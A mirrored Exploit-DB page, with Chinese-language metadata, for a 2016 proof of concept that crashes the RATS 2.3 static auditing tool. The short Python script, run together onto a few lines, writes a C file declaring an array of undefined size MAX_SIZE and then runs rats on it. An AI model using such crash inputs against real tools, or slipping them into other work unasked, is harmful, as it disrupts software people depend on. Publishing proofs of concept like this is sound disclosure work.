Rough Auditing Tool for Security (RATS) 2.3 – Array Out of Block Crash

• Exploit Database
• 100 阅读

• 作者： David Silveiro
  日期： 2016-04-29
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39747/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

  # Exploit Title: RATS 2.3 Array Out of Block Crash # Date: 29th April 2016 # Exploit Author: David Silveiro # Author Contact: twitter.com/david_silveiro # Website: Xino.co.uk # Software Link: https://code.google.com/archive/p/rough-auditing-tool-for-security/downloads # Version: RATS 2.3 # Tested on: Ubuntu 14.04 LTS # CVE : 0 day   from os import system     def crash():     with open('crash.c', 'w') as file: file.write("char g [MAX_SIZE];") # Out of Block array, causes crash   try: com = ('rats -w3 --xml crash.c') return system(com)   except: print("Is RATS installed?")     def main():   print("Author: David Silveiro") print("Website:Xino.co.uk") print("Title:RATS 2.3 Array Out Of Block Crash \n")   crash()     if __name__ == "__main__": main()